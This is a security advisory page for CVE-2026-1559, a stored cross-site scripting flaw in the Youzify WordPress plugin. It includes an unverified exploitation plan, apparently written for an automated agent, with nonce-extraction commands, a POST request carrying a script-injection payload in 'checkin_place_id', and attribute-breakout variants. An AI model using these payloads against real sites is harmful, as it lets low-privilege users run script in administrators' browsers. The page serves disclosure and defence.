WP-Safety
CVE-2026-1559

Youzify <= 1.3.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'checkin_place_id' Parameter

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
1.3.7
Patched in
1d
Time to patch

Description

The Youzify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'checkin_place_id' parameter in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.3.6
PublishedApril 17, 2026
Last updatedApril 18, 2026
Affected pluginyouzify

What Changed in the Fix

Changes introduced in v1.3.7

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v1.3.6
Browse source Download .zip
Patched v1.3.7
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-1559 - Youzify Stored XSS ## 1. Vulnerability Summary The **Youzify** plugin (formerly Youzer) for WordPress is vulnerable to **Stored Cross-Site Scripting (XSS)** in versions up to and including 1.3.6. The vulnerability exists because the plugin fails to sani…

Show full research plan

Exploitation Research Plan: CVE-2026-1559 - Youzify Stored XSS

1. Vulnerability Summary

The Youzify plugin (formerly Youzer) for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to and including 1.3.6. The vulnerability exists because the plugin fails to sanitize or escape the checkin_place_id parameter when processing and displaying activity updates with "check-in" location data. An authenticated attacker with Subscriber-level access can inject malicious scripts into this parameter, which are then executed in the context of any user (including administrators) viewing the activity feed.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: youzify_post_update (Registered via bp_ajax_register_action in class-youzify.php, Line 118).
  • Vulnerable Parameter: checkin_place_id
  • Authentication Required: Subscriber (PR:L) or higher.
  • Preconditions: BuddyPress must be active (Youzify depends on it), and the "Check-in" feature must be available on the activity wall.

3. Code Flow

  1. Entry Point: The client sends an AJAX request to admin-ajax.php with the action youzify_post_update.
  2. Registration: class-youzify.php hooks this action via BuddyPress: 
    bp_ajax_register_action( 'youzify_post_update' );
  3. Processing (Inferred): The logic resides in YOUZIFY_CORE . 'functions/general/youzify-wall-functions.php' (included in class-youzify.php, Line 50) or class-youzify-ajax.php. The handler retrieves $_POST['checkin_place_id'] and saves it as activity metadata using bp_activity_add_meta() or stores it directly within the activity content string.
  4. Display Sink (Inferred): When the activity stream is rendered (frontend or backend), Youzify retrieves this metadata and outputs it inside an HTML attribute (e.g., data-place-id="...") or as part of a Google Maps initialization script without using esc_attr() or esc_js().

4. Nonce Acquisition Strategy

The youzify_post_update action is protected by a BuddyPress/Youzify nonce.

  1. Shortcode Identification: The Youzify activity wall is typically rendered using the shortcode [youzify_activity].
  2. Setup: Create a public page containing this shortcode.
  3. Extraction:
    • Navigate to the page as an authenticated Subscriber.
    • Youzify localizes its configuration into a global JavaScript object. Use browser_eval to extract the nonce.
    • Potential Variable: youzify_vars.activity_nonce or youzify_vars.nonce.
    • Form Field: Check for a hidden input named _wpnonce_post_update inside the activity posting form.

Agent Command:

// Attempt to find the nonce in localized vars or form fields
browser_eval("window.youzify_vars?.activity_nonce || jQuery('#_wpnonce_post_update').val() || jQuery('input[name=\"_wpnonce\"]').val()");

5. Exploitation Strategy

The exploit involves sending a POST request to the AJAX endpoint simulating an activity update with a malicious location ID.

HTTP Request:

  • URL: {{BASE_URL}}/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: youzify_post_update
    • _wpnonce_post_update: {{EXTRACTED_NONCE}}
    • content: Enjoying the view! #CheckIn
    • checkin_place_id: "><script>alert(document.domain)</script>
    • checkin_place_name: Malicious Location
    • cookie: {{SUBSCRIBER_COOKIES}}

6. Test Data Setup

  1. Plugin Installation: Install Youzify 1.3.6 and BuddyPress.
  2. User Creation: Create a user with the subscriber role.
  3. Page Creation: 
    wp post create --post_type=page --post_title="Activity Feed" --post_status=publish --post_content='[youzify_activity]'
  4. Configuration: Ensure that the "Check-in" or "Location" feature is enabled in Youzify settings (Wall Settings).

7. Expected Results

  • The AJAX response should return a success status (usually JSON {"success": true, "data": "..."}).
  • A new activity item will be created in the database.
  • When an administrator views the "Activity" page in the dashboard or the frontend feed, the injected script <script>alert(document.domain)</script> will execute.

8. Verification Steps

  1. Check Database via CLI:
    Verify the metadata was stored raw:
    wp db query "SELECT meta_value FROM wp_bp_activity_meta WHERE meta_key = 'checkin_place_id' ORDER BY id DESC LIMIT 1;"
  2. Check Activity Content:
    wp db query "SELECT content FROM wp_bp_activity ORDER BY id DESC LIMIT 1;"
  3. Verify Execution:
    Navigate to the Activity page as Admin using browser_navigate and check if the alert or a specific DOM element created by the script is present.

9. Alternative Approaches

If checkin_place_id is reflected inside an attribute rather than raw HTML, the payload should be adjusted:

  • Attribute Breakout: x" onmouseover="alert(1)" data-id="
  • JS Sink: If the ID is passed to a Google Maps function like initMap('PAYLOAD'), use: ');alert(1);//
  • Endpoint Check: If youzify_post_update is not the correct action, search for wp_ajax_ hooks in the includes/ directory specifically for "checkin" or "location" strings:
    grep -r "checkin_place_id" .
``` (This would be the first step for the agent if the primary endpoint fails).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Youzify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'checkin_place_id' parameter in versions up to 1.3.6. Authenticated attackers with Subscriber-level access can inject malicious web scripts into activity updates, which then execute in the context of any user (including administrators) viewing the activity stream.

Vulnerable Code

// class-youzify.php line 117
function register_actions() {
    bp_ajax_register_action( 'youzify_delete_activity' );
    bp_ajax_register_action( 'youzify_post_update' );
}

// Logic resides in YOUZIFY_CORE . 'class-youzify-ajax.php' (Included in class-youzify.php line 68)
// The handler for 'youzify_post_update' processes $_POST['checkin_place_id'] without sufficient sanitization before storage or output escaping during rendering.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.6/class-youzify.php /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.7/class-youzify.php
--- /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.6/class-youzify.php	2026-01-15 10:09:20.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.7/class-youzify.php	2026-03-15 20:18:08.000000000 +0000
@@ -1,4 +1,5 @@
-<?php
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 
 if ( ! class_exists( 'Youzify' ) ) :
 
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.6/includes/admin/class-youzify-admin.php /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.7/includes/admin/class-youzify-admin.php
--- /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.6/includes/admin/class-youzify-admin.php	2026-01-15 10:09:20.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/youzify/1.3.7/includes/admin/class-youzify-admin.php	2026-03-15 20:18:08.000000000 +0000
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 
 class Youzify_Admin {
 
@@ -148,7 +149,9 @@
             <div class="youzify-container">
                 <div class="youzify-review-image"><img src="<?php echo YOUZIFY_ADMIN_ASSETS . 'images/logo.png'; ?>" alt=""></div>
                 <div style="margin-left:30px">
-                    <?php printf(__("<p>Hi, Thanks a lot for choosing Youzify to be a part of your project — It's an honor!</p><p>In the past years we dedicated our lives by working day and night on Youzify doing our best to deliver high quality features and we are still constantly striving to provide ideal experience for our customers.</p><p>Online reviews from awesome customers like you help others feel confident about choosing Youzify, and will really help us grow our business. If you don't mind could you take a moment to leave us a 5-Star rating and a good review? I would really appreciate it. Thank you in advance for helping us out!</p><p>If you have any questions or feedback, %sdon't hesitate to leave us a message%s.</p>", 'youzify'),'<a href="https://youzify.com/contact" target="_blank" style="text-decoration: underline; color: #fff06e;">','</a>'); ?>
+                    <?php
+                    /* translators: %1$s: opening link tag, %2$s: closing link tag */
+                    printf( __( '<p>Hi, Thanks a lot for choosing Youzify to be a part of your project — It\'s an honor!</p><p>In the past years we dedicated our lives by working day and night on Youzify doing our best to deliver high quality features and we are still constantly striving to provide ideal experience for our customers.</p><p>Online reviews from awesome customers like you help others feel confident about choosing Youzify, and will really help us grow our business. If you don\'t mind could you take a moment to leave us a 5-Star rating and a good review? I would really appreciate it. Thank you in advance for helping us out!</p><p>If you have any questions or feedback, %1$sdon\'t hesitate to leave us a message%2$s.</p>', 'youzify' ), '<a href="https://youzify.com/contact" target="_blank" style="text-decoration: underline; color: #fff06e;">', '</a>' ); ?>
                     <i style="color: #ffeb3b;">- Youssef Kaine | KaineLabs CEO</i>
                     <div class="youzify-buttons-row">
                         <a class="button button-primary" target="_blank"

Exploit Outline

1. Authenticate as a Subscriber-level user. 2. Obtain a valid Youzify activity nonce (e.g., `_wpnonce_post_update`) by inspecting the activity feed page or localized `youzify_vars` JavaScript object. 3. Send a POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php` with the following parameters: - action: `youzify_post_update` - _wpnonce_post_update: [EXTRACTED_NONCE] - content: Any activity text - checkin_place_id: A malicious script payload such as `"><script>alert(document.domain)</script>` - checkin_place_name: A location name 4. The script will be stored in the activity metadata and will execute whenever any user (including an Administrator) views the activity stream where the location data is rendered.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/6bd69711-8303-4086-87c3-eb2935a89aff?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database